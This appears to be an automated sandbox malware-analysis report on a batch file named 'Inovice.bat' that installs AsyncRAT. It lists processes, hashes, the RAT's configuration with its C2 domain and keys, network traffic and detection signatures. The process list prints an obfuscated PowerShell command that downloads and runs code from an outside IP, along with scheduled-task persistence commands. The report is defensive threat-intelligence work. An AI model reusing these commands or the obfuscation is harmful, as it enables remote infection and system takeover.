File name:

Inovice.bat

Full analysis: https://app.any.run/tasks/3bd6edf1-e76e-40d5-bfaa-0ef4a844e6e8
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Analysis date: December 05, 2022, 19:47:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
asyncrat
trojan
rat
Indicators:
MIME: text/plain
File info: UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:

BF021F142FA831D9BE71B25476DAF0F6

SHA1:

F2F5735ACD04E2228AC09586CAD425B82409F253

SHA256:

8DBAC79CA4B263BE822F6DDAE805B854753E1118767353654CC26DAB34F44C49

SSDEEP:

192:lzJ1cqL+cWrc2DaODe779zgWg94YWNjaOfQ:pJ1cqL+cWrc2DFe77pgWg94YWNje

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2624)
      • schtasks.exe (PID: 3428)
      • schtasks.exe (PID: 2188)
    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 1260)
    • ASYNCRAT detected by memory dumps

      • powershell.exe (PID: 1260)
      • aspnet_compiler.exe (PID: 2116)
    • ASYNCRAT was detected

      • aspnet_compiler.exe (PID: 2116)
  • SUSPICIOUS

    • Executes scripts

      • powershell.exe (PID: 1112)
    • Executes PowerShell scripts

      • WScript.exe (PID: 3992)
      • cmd.exe (PID: 3712)
      • WScript.exe (PID: 2692)
    • Application launched itself

      • cmd.exe (PID: 3248)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3248)
    • Executes via Task Scheduler

      • WScript.exe (PID: 2692)
    • Reads the Internet Settings

      • aspnet_compiler.exe (PID: 2116)
    • Reads settings of System Certificates

      • aspnet_compiler.exe (PID: 2116)
  • INFO

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 1112)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 1260)
    • Creates a file in a temporary directory

      • powershell.exe (PID: 1112)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 1260)
    • Checks supported languages

      • aspnet_compiler.exe (PID: 2116)
    • Reads Environment values

      • aspnet_compiler.exe (PID: 2116)
    • Reads the computer name

      • aspnet_compiler.exe (PID: 2116)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AsyncRat

(PID) Process(2116) aspnet_compiler.exe
Install_Folder%AppData%
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Aes_Key561bcf00f570f137c8049f75c5148cefbf0cac7746be869c32dad39fe5aefa7c
BotnetBTC Address
bdosfalse
PasteBintrue
AntiVMfalse
Server_SignatureGN/8+ivB5wP1EgjZz+u1FhO8aO9NgzdVSIcOWchN4HViQsmv9aHf+cFGGYig0z/6sh99BuCvSo8a4DxHwzbuD8XTbnyWbMFpqRIBWVDUC2byxpV9WOSo/wIDfM1eH4aC7w2O2lw/+Vr46R+v9Q39gocEdKlWmM67S2+FMW/y50Q/CTXP/JRNcPLgJpEP9CwQ6ykMP/idAxxIyW279D0IqdLKbHCEmKQ8eNdQyDKv/0JJumBazodAsL4i+P0wdwFtHV3+JhpN2MmDzi67uD/WCEAqmZAvquDZAnaRZK2LrqCS...
CertificateMIIE8jCCAtqgAwIBAgIQANbiVxLaNmSYyv61DmCgDzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNDE0MjMyNTI3WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJZsIsXBl2b0q/B3i8jEIs3V21H0zFCak2edQRldp7T71gCRF3gDcDdUQ2gKHnqhJYT+n6ivj/5B...
MutexAsyncMutex_fghd
Autorunfalse
Version| Edit 3LOSH RAT
Ports (1)6666
C2 (1)aboreda.linkpc.net
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
11
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs powershell.exe wscript.exe no specs powershell.exe no specs schtasks.exe no specs schtasks.exe no specs wscript.exe no specs #ASYNCRAT powershell.exe no specs #ASYNCRAT aspnet_compiler.exe schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3248C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Inovice.bat" "C:\Windows\system32\cmd.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3712CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019='IEX(NEW-OBJECT NET.W';$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5='EBCLIENT).DOWNLO';[BYTE[]];$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032='2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2(''http://198.20.177.229:444/x.png'')'.REPLACE('2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2','ADSTRING');[BYTE[]];IEX($2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019+$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5+$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032)C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1112POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019='IEX(NEW-OBJECT NET.W';$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5='EBCLIENT).DOWNLO';[BYTE[]];$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032='2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2(''http://198.20.177.229:444/x.png'')'.REPLACE('2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2','ADSTRING');[BYTE[]];IEX($2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019+$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5+$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\lpk.dll
3992"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\Logs\install.vbs" C:\Windows\System32\WScript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3112"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\install.ps1'))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3428"C:\Windows\system32\schtasks.exe" /create /tn det /sc minute /st 00:10 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbsC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\kernel32.dll
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2624"C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 3 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbsC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2692C:\Windows\System32\WScript.exe "C:\Users\admin\AppData\Roaming\Logs\Loader.vbs"C:\Windows\System32\WScript.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1260"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\Report.ps1'))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2116"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
aspnet_compiler.exe
Version:
4.0.30319.34209 built by: FX452RTMGDR
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\aspnet_compiler.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
AsyncRat
(PID) Process(2116) aspnet_compiler.exe
Install_Folder%AppData%
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Aes_Key561bcf00f570f137c8049f75c5148cefbf0cac7746be869c32dad39fe5aefa7c
BotnetBTC Address
bdosfalse
PasteBintrue
AntiVMfalse
Server_SignatureGN/8+ivB5wP1EgjZz+u1FhO8aO9NgzdVSIcOWchN4HViQsmv9aHf+cFGGYig0z/6sh99BuCvSo8a4DxHwzbuD8XTbnyWbMFpqRIBWVDUC2byxpV9WOSo/wIDfM1eH4aC7w2O2lw/+Vr46R+v9Q39gocEdKlWmM67S2+FMW/y50Q/CTXP/JRNcPLgJpEP9CwQ6ykMP/idAxxIyW279D0IqdLKbHCEmKQ8eNdQyDKv/0JJumBazodAsL4i+P0wdwFtHV3+JhpN2MmDzi67uD/WCEAqmZAvquDZAnaRZK2LrqCS...
CertificateMIIE8jCCAtqgAwIBAgIQANbiVxLaNmSYyv61DmCgDzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNDE0MjMyNTI3WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJZsIsXBl2b0q/B3i8jEIs3V21H0zFCak2edQRldp7T71gCRF3gDcDdUQ2gKHnqhJYT+n6ivj/5B...
MutexAsyncMutex_fghd
Autorunfalse
Version| Edit 3LOSH RAT
Ports (1)6666
C2 (1)aboreda.linkpc.net
Total events
7 601
Read events
7 551
Write events
50
Delete events
0

Modification events

(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:FileTracingMask
Value:
(PID) Process:(1112) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:ConsoleTracingMask
Value:
Executable files
0
Suspicious files
9
Text files
4
Unknown types
2

Dropped files

PID
Process
Filename
Type
1260powershell.exeC:\Users\admin\AppData\Local\Temp\51v2aea5.1nk.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
1112powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivedbf
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
1112powershell.exeC:\Users\admin\AppData\Roaming\Logs\Loader.vbstext
MD5:7A1F08FD27F797B5A5CC2D79F8F6BBA7
SHA256:922DC773ABDFD0812B0E1ADCAABF9DEA2E5F0264573266CF0B024FEB984C632E
3112powershell.exeC:\Users\admin\AppData\Local\Temp\qntzpoo4.qqv.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
1112powershell.exeC:\Users\admin\AppData\Local\Temp\5ls2h5gk.p1g.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
1112powershell.exeC:\Users\admin\AppData\Roaming\Logs\install.ps1text
MD5:6BDB23DD1842EFAA701CED26BB8AE3A5
SHA256:4E0C891BA520FC17F612E1D65B0549AEA0533070237B7BC27EE36613E212429C
1112powershell.exeC:\Users\admin\AppData\Local\Temp\me0xnowd.zwp.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2116aspnet_compiler.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:3EC598FDA7DA5A6080350EADC34CA03F
SHA256:9739D6314CAEA5B5779C6D80E00F205CD57594DC702DAA458528BF92D1E1C1DB
1112powershell.exeC:\Users\admin\AppData\Roaming\Logs\Report.ps1text
MD5:AFEB32EFA5CDAAEE1360F00886C19B10
SHA256:8C46090FB44AF131902A35351D71A5026EEEF32B3CAF880A0C7398BE5D3AD85F
3112powershell.exeC:\Users\admin\AppData\Local\Temp\epblj1av.etq.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
2
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1112
powershell.exe
GET
200
198.20.177.229:444
http://198.20.177.229:444/x.png
US
text
243 Kb
malicious
2116
aspnet_compiler.exe
GET
200
95.140.236.128:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9f7f011d88e2d5c1
GB
compressed
61.4 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2116
aspnet_compiler.exe
95.140.236.128:80
ctldl.windowsupdate.com
LLNW
US
malicious
1112
powershell.exe
198.20.177.229:444
aboreda.linkpc.net
SERVER-MANIA
US
malicious
2116
aspnet_compiler.exe
198.20.177.229:6666
aboreda.linkpc.net
SERVER-MANIA
US
malicious

DNS requests

Domain
IP
Reputation
aboreda.linkpc.net
  • 198.20.177.229
malicious
ctldl.windowsupdate.com
  • 95.140.236.128
  • 178.79.242.128
whitelisted

Threats

PID
Process
Class
Message
1112
powershell.exe
Misc activity
ET INFO [TW] Likely Hex Executable String
1112
powershell.exe
Executable code was detected
ET SHELLCODE Common 0a0a0a0a Heap Spray String
Potentially Bad Traffic
ET INFO Observed DNS Query to DynDNS Domain (linkpc .net)
2116
aspnet_compiler.exe
A Network Trojan was detected
ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)
2116
aspnet_compiler.exe
A Network Trojan was detected
ET TROJAN Generic AsyncRAT Style SSL Cert
1 ETPRO signatures available at the full report
No debug info